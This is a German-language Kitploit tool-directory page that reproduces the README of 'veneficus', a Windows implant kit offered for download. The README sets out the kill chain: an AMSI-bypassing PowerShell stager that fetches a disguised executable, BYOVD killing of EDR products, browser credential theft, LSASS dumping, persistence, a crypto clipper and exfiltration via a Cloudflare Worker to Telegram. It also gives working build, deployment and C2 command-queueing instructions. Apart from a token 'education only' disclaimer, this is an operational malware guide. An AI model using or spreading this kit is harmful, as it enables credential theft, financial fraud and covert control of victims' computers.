Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
veneficus — Super-elitäres End-to-End-Implantat 0day. Vollständige Kill-Chain. Ausnutzen, eskalieren, pivotieren, vergiften, Persistenz. | Kitploit
Tools/GitHubGitHub/abraxas/veneficus
Privilege EscalationPersistenzmechanismenIDS/IPS-UmgehungLaterale BewegungDatenexfiltrationPost-ExploitationMalware-AnalyseCommand and ControlRed TeamingPayload-EntwicklungRemote-Access-Trojaner
218vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
abraxas/veneficus

veneficus

Super-elitäres End-to-End-Implantat 0day. Vollständige Kill-Chain. Ausnutzen, eskalieren, pivotieren, vergiften, Persistenz.

Repository anzeigen

ABRAXAS LABS — analysieren · reversen · offenlegen

@abraxas_null · [email protected] · abraxaslabs.tech · github.com/abraxas/veneficus
Credit: @YoSoth0

Veneficus Mini v3.0

Windows 10/11 x64 Implant-Kit: ein PowerShell-Stager, ein Rust-PE und ein Cloudflare Worker, der den Operator per Telegram alarmiert.

Der Stager (resources/loader.ps1) soll AMSI im aktuellen PowerShell-Prozess verstummen lassen, das Implant von der /beacon-Route des Workers abrufen und es als %TEMP%\MicrosoftEdgeUpdate.exe starten. Das PE bewertet anschließend den Host auf Sandbox-/Analysten-Artefakte. Ein hoher Score löscht die Binärdatei; ein mittlerer Score geht in den „Safe Mode" (nur Fingerprinting); ein niedriger Score führt den vollen Stack aus — AMSI/ETW-Patches, einen BYOVD-Pool gegen benannte EDR-Prozesse, Browser-Credential-Diebstahl, eine LSASS-Dump-Kette, WMI/Scheduled-Task/Run-Persistenz, einen localhost-SOCKS5-Proxy, einen localhost-HVNC/RFB-Listener und einen Clipboard-Clipper für Krypto-Adressen. Eine gejitterte HTTPS-Schleife sendet Beacons und pollt einen kleinen Befehlssatz (/status, /proxy_on, /self_destruct, /re_infect, /sleep, Safe-Mode-Toggles). Der Exfil erfolgt per AES-256-GCM mit einem HMAC, verschlüsselt mit einer zur Kompilierzeit eingebetteten UUID; der Worker soll den Ciphertext weiterleiten, ohne den Schlüssel zu besitzen.

Dieses Repository wird zu Bildungs- und Analysezwecken veröffentlicht. Eine Datei-für-Datei-Betrachtung dessen, was implementiert versus gestubbt ist, findet sich in VENEFICUS_MINI_v3_DEEP_ANALYSIS.md.

Nur für Bildungszwecke. 2026 Alle Rechte umgekehrt.


Architektur

VICTIM MACHINE
  loader.ps1 (AMSI/ETW bypass → download → execute)
    └── veneficus_mini.exe
          ├── Environment assessment (sandbox/VM/analyst detection)
          ├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
          ├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
          ├── Payload: creds, cookies, LSASS dump, device fingerprint
          ├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
          ├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
          ├── HVNC (127.0.0.1:5900 by default, configurable)
          ├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
          └── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
                ↕ HTTPS
CLOUDFLARE WORKER
  /beacon   → implant download
  /exfil    → receive encrypted data → forward ciphertext to Telegram
  /commands → return queued commands (one-time queue)
  /config   → return operator config blob
  /admin    → queue commands  (requires X-Admin-Key)
  /register → register UUID   (requires X-Admin-Key)
  /unregister → revoke UUID   (requires X-Admin-Key)
  /listing  → list all UUIDs (requires X-Admin-Key)
  /set_config → push config  (requires X-Admin-Key)
                ↓
TELEGRAM BOT
  Receives: ciphertext + nonce + HMAC (operator decrypts offline)

Voraussetzungen

KomponenteInstallation
Rust + cargocurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Windows-Cross-Compile-Targetrustup target add x86_64-pc-windows-gnu
MinGW-Cross-Linkersudo apt install mingw-w64
Wrangler (CF Worker CLI)npm install -g wrangler

Einrichtung

1. Cloudflare Worker

wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js

wrangler secret put TELEGRAM_TOKEN     # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID   # your chat/group ID
wrangler secret put ADMIN_KEY          # random 32-char secret

wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"

# Add KV bindings to wrangler.toml:
#   [[kv_namespaces]]
#   binding = "UUID_KV"
#   id = "<uuid_kv_id>"
#   (repeat for COMMANDS_KV, CONFIG_KV)

wrangler deploy

2. Relay-URL generieren

import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode())   # → set as RELAY_URL_BYTES

3. Build

RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu

Platziere verwundbare Treiber-.sys-Dateien in drivers/ und Tool-Binärdateien in tools/ vor dem Build.

4. Implant-UUID registrieren

UUID aus der Binärdatei auslesen (zur Build-Zeit eingebettet):

strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"

Über die Admin-API registrieren:

curl -X POST https://your-worker.workers.dev/register \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'

5. Operator-Konfiguration pushen (Clipper-Adressen usw.)

curl -X POST https://your-worker.workers.dev/set_config \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "implant_uuid": "global",
    "config": {
      "clipper_addresses": {
        "bitcoin":  "bc1qyourwallethere",
        "ethereum": "0xYOURWALLETHERE"
      },
      "reinfect_url": "https://your-worker.workers.dev/beacon"
    }
  }'

C2-Befehle

Über den /admin-Endpunkt senden:

curl -X POST https://your-worker.workers.dev/admin \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","command":"/status"}'
BefehlWirkung
/self_destruct3-Pass-Wipe + Event-Log-Bereinigung + Beenden
/re_infectNeues Payload von reinfect_url in der Konfiguration herunterladen, sich selbst ersetzen
/statusPID, Proxy-Status, Safe-Mode, UUID an C2 zurücksenden
/proxy_onSOCKS5-Proxy aktivieren
/proxy_offSOCKS5-Proxy deaktivieren
/exit_safeSafe Mode verlassen, vollen Betrieb fortsetzen
/enter_safeSafe Mode betreten (nur Fingerprinting)
/sleep <secs>Basis-C2-Poll-Intervall überschreiben

Fallback-Ketten

ModulKette (links = zuerst versucht)
BYOVDK7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → Blocklist deaktivieren
LSASSMiniDumpWriteDump (nativ) → WDigest-Patch → LSA Whisperer → DumpGuard → PPL-Bypass (RTCore64)
NTLMPrinterBug → PetitPotam → Cross-Protocol-Relay (HTTP→LDAP) → CVE-2025-33073 → MSSQL-Relay
SyscallsTartarus Gate → Halo's Gate → ntdll-Unhook → indirekt → Standard-WinAPI
DKOMEPROCESS-Unlink → PspChained-Enumeration → EDR-Callback-Unregister
PersistenzWMI-Subscription → Scheduled Task → HKLM-Run-Key

Verzeichnisstruktur

Tool herunterladen